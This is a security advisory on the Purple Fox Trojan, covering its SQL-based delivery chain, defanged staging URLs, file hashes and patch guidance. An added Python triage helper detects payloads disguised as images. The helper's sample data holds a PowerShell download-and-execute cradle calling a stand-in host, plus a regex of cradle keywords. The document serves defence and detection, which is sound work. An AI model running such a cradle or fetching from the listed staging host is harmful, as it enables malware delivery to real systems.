December 4, 2019
Severity
High
Analysis Summary
The Purple Fox Trojan is being pushed to hosts the attackers have already compromised through SQL; the staging paths under /sqlexec/ indicate commands being run through a compromised SQL Server instance. After the initial access, the attackers download and execute several components: the Purple Fox MSI installation package, stand-alone privilege-escalation exploits and a PowerShell dropper script. The script's main job is to download and execute further files that are served with .jpg and .png names. The image extension is only a disguise: the files are PowerShell scripts, the Purple Fox MSI installer and EXE privilege-escalation exploits. The exploits downloaded cover CVE-2018-8120, CVE-2015-1701 and MS16-032, all Windows local privilege-escalation flaws. They are used to raise the privileges of the current process so that the malware's MSI package can be installed successfully even when the foothold runs as a low-privileged account.
MS16-032 download address:
hxxp://es.ldbdhm[.]xyz/sqlexec/1603232.jpg
CVE-2018-8120 module download addresses:
hxxp://es.ldbdhm[.]xyz/sqlexec/1808164.jpg
hxxp://es.ldbdhm[.]xyz/sqlexec/1808132.jpg
The file names appear to encode the exploit and the target architecture (the 1808164/1808132 pair for CVE-2018-8120, with a 64 or 32 suffix); by the same pattern, the 1505164/1505132 and 1603264 files in the URL list below are presumably the CVE-2015-1701 builds and the 64-bit MS16-032 build.
The downloaded SMB1.jpg, SMB3.jpg and Sps.jpg files are actually MSI installation packages. The download address is hxxp://Es.ldbdhm[.]xyz/sqlexec/xxx.jpg, where xxx is the file name.
Impact
- Code Execution
- Privilege Escalation
- Unauthorized Access
Indicators of Compromise
MD5
- 364ac68062168fc334f478a2997c6298
- 4facb81f57e515a508040270849bcd35
- 3fe38271b009298b4cb0b01ef57edbf3
- de5de649e0821b0dd3dadfa8235416ea
- be0384e85412a2668008f76dc3b3ccea
- f5df39c5ed4eb90c169216ace51ed833
- 5bab2f1dd53b3ae08dab8a1a2d7c145c
- 4658ddc4e03f0003f590666ab73261e3
- 2c62e2fbef311731ebbc26c785d10f2b
- 14018f47163809b0166591f87d1bb046
- 6467874d952a5ffc1edfd7f05b1cc86d
- beac6592dbd3a479a64789e43ec20f27
- b43442df320d1f89defd772991b6335c
- ae3e7304122469f2de3ecbd920a768d1
SHA-256
- 51a81cc0bbf67360833332d7e13aaa8b2cca6e8a18d117803cc7094bbb0336ed
- 07191e65af30541f71e876b6037079a070a34c435641897dc788c15e5f62f53c
- b2cb65c9ac36f1e3fb31dfd5235c29b396be0968e6b225d625dc3c8fd72395f4
- 762551af11f78b73441b33bd7d70890d9f835cf878dd7088463b7b07bc007aa5
- 0a6c1b99447a8ef47f8aabc57c3254b1ba128ab1dc3024453062b21ac22cc45a
- 4bf8d57ffdbfd400048b874ed0b42a8ca7f8257b7d244b7c856b6c9bf680486f
- 78375c2ea7c8fb7fb40d41f750eab63271348a11559ddb71410b16e66326d373
- 5e45545b7dd0af0ef81bee46477d41c80b6c866a4435e67306bb3c0f4f600651
- 48866c413efcfa1c5f7ab15054a16415884101e9eca2873d9a1f138440a66cfb
- 5a6f76daca16b2d8f737e8e51a2290d89aae5d412b6b0328f14b3094401e72f2
- ca7bd2830405ed53fd7f56738d7644ff8ecfd5bc63d079d322c99601c6106843
- f0b0e0548b218fb81940a4daf85c3709b2159bb357cab2f55576af3d75d47094
- 61113a0acd6469ce0d860db55c2afa3cdcbac2f5411fe8259cca43c10c042239
- 33a584a0d4907b063af867fd33cc39362b74e96e72d2ad97db7748131364eab1
URL
- hxxp://es.ldbdhm[.]xyz/SMB3.jpg
- hxxp://es.ldbdhm[.]xyz/sqlexec/1808164.jpg
- hxxp://es.ldbdhm[.]xyz/sqlexec/1808132.jpg
- hxxp://es.ldbdhm[.]xyz/sqlexec/pe.jpg
- hxxp://es.ldbdhm[.]xyz/sqlexec/sps.jpg
- hxxp://es.ldbdhm[.]xyz/smb3p.jpg
- hxxp://es.ldbdhm[.]xyz/SMB1.jpg
- hxxp://es.ldbdhm[.]xyz/SMB2.jpg
- hxxp://es.ldbdhm[.]xyz/SMB2P.jpg
- hxxp://es.ldbdhm[.]xyz/smb1p.jpg
- hxxp://es.ldbdhm[.]xyz/sqlexec/1505164.jpg
- hxxp://es.ldbdhm[.]xyz/sqlexec/1603232.jpg
- hxxp://es.ldbdhm[.]xyz/sqlexec/1505132.jpg
- hxxp://es.ldbdhm[.]xyz/sqlexec/1603264.jpg
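A triage helper for the chain described above, added here as an illustrative example (it is not code from the original advisory). It identifies the real type of a downloaded ".jpg" from its leading bytes, so a PE, MSI or PowerShell payload hiding behind an image name is flagged; checks a blob's SHA-256 against the advisory's hash list; and pulls requests to the staging host out of proxy-log lines. The log lines and file blobs inside it are constructed samples, not real telemetry or the real malware.

```python
"""Triage helper for the Purple Fox chain above (example code added to this
page, not from the original advisory): detect payloads disguised as images,
match file hashes and proxy requests against the advisory's IoCs."""
import hashlib
import re
from urllib.parse import urlsplit

# Staging host and file hashes copied from the IoC section above.
IOC_DOMAIN = "es.ldbdhm.xyz"
IOC_SHA256 = {
    "51a81cc0bbf67360833332d7e13aaa8b2cca6e8a18d117803cc7094bbb0336ed",
    "07191e65af30541f71e876b6037079a070a34c435641897dc788c15e5f62f53c",
    "b2cb65c9ac36f1e3fb31dfd5235c29b396be0968e6b225d625dc3c8fd72395f4",
    "762551af11f78b73441b33bd7d70890d9f835cf878dd7088463b7b07bc007aa5",
    "0a6c1b99447a8ef47f8aabc57c3254b1ba128ab1dc3024453062b21ac22cc45a",
    "4bf8d57ffdbfd400048b874ed0b42a8ca7f8257b7d244b7c856b6c9bf680486f",
    "78375c2ea7c8fb7fb40d41f750eab63271348a11559ddb71410b16e66326d373",
    "5e45545b7dd0af0ef81bee46477d41c80b6c866a4435e67306bb3c0f4f600651",
    "48866c413efcfa1c5f7ab15054a16415884101e9eca2873d9a1f138440a66cfb",
    "5a6f76daca16b2d8f737e8e51a2290d89aae5d412b6b0328f14b3094401e72f2",
    "ca7bd2830405ed53fd7f56738d7644ff8ecfd5bc63d079d322c99601c6106843",
    "f0b0e0548b218fb81940a4daf85c3709b2159bb357cab2f55576af3d75d47094",
    "61113a0acd6469ce0d860db55c2afa3cdcbac2f5411fe8259cca43c10c042239",
    "33a584a0d4907b063af867fd33cc39362b74e96e72d2ad97db7748131364eab1",
}

# Leading bytes that give away the real file type, whatever the extension says.
MAGIC = (
    ("jpeg", b"\xff\xd8\xff"),
    ("png", b"\x89PNG\r\n\x1a\n"),
    ("msi", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"),  # OLE compound file: the MSI container
    ("pe", b"MZ"),                                  # Windows EXE/DLL
)
# Download-cradle keywords typical of a PowerShell dropper (plain text, no magic bytes).
PS_CRADLE = re.compile(rb"(?i)IEX|Invoke-Expression|DownloadString|DownloadFile|Net\.WebClient")


def classify(data: bytes) -> str:
    """Return the real type of a downloaded blob from its content."""
    for kind, magic in MAGIC:
        if data.startswith(magic):
            return kind
    if PS_CRADLE.search(data[:4096]):
        return "powershell"
    return "unknown"


def is_disguised(name: str, data: bytes) -> bool:
    """True when the file name claims an image but the bytes are something else."""
    ext = name.rsplit(".", 1)[-1].lower()
    expected = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png"}.get(ext)
    return expected is not None and classify(data) != expected


def hash_match(data: bytes) -> bool:
    """True if the blob's SHA-256 is one of the advisory's file IoCs."""
    return hashlib.sha256(data).hexdigest() in IOC_SHA256


# Request field of a combined-log-format access log line: "GET <url> HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+)')


def ioc_requests(log_lines):
    """Return every requested URL whose host is the Purple Fox staging domain."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and (urlsplit(m.group(1)).hostname or "").lower() == IOC_DOMAIN:
            hits.append(m.group(1))
    return hits


# Constructed sample log lines (not real telemetry) in combined log format.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Dec/2019:10:12:01 +0000] "GET http://example.org/index.html HTTP/1.1" 200 512',
    '10.0.0.7 - - [04/Dec/2019:10:12:09 +0000] "GET http://es.ldbdhm.xyz/sqlexec/1808164.jpg HTTP/1.1" 200 65536',
    '10.0.0.7 - - [04/Dec/2019:10:12:15 +0000] "GET http://es.ldbdhm.xyz/SMB3.jpg HTTP/1.1" 200 1048576',
]

if __name__ == "__main__":
    # Constructed blobs standing in for downloaded "images" (not the real samples).
    samples = {
        "1808164.jpg": b"MZ\x90\x00" + b"\x00" * 60,                      # PE exploit
        "SMB3.jpg": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 60,   # MSI package
        "sps.jpg": b"IEX (New-Object Net.WebClient).DownloadString('http://host/a.jpg')",
        "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 60,                  # genuine JPEG
    }
    for name, blob in samples.items():
        print(f"{name}: type={classify(blob)} disguised={is_disguised(name, blob)} ioc_hash={hash_match(blob)}")
    print("requests to staging host:", ioc_requests(SAMPLE_LOG))
```

Run it over the files a proxy or EDR quarantined and over the proxy's access log; a ".jpg" that classifies as msi, pe or powershell is a hit regardless of whether its hash is in the list, which matters because the attackers can rebuild the payloads faster than hash lists are updated. The MD5 list above can be added alongside the SHA-256 set in the same way.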
Remediation
- Block the threat indicators at their respective controls: the es.ldbdhm[.]xyz URLs at the web proxy and DNS layer, the file hashes at the endpoint and anti-malware layer.
- Apply the Windows patches for CVE-2018-8120, CVE-2015-1701 (MS15-051) and MS16-032. All three are local privilege-escalation flaws; on an unpatched host they let the dropper go from the SQL foothold to the privileges it needs to install the MSI package.
- Harden the SQL Server exposure the chain starts from: strong credentials for sa and other logins, no direct internet exposure of the instance, and disable command execution features such as xp_cmdshell where they are not required.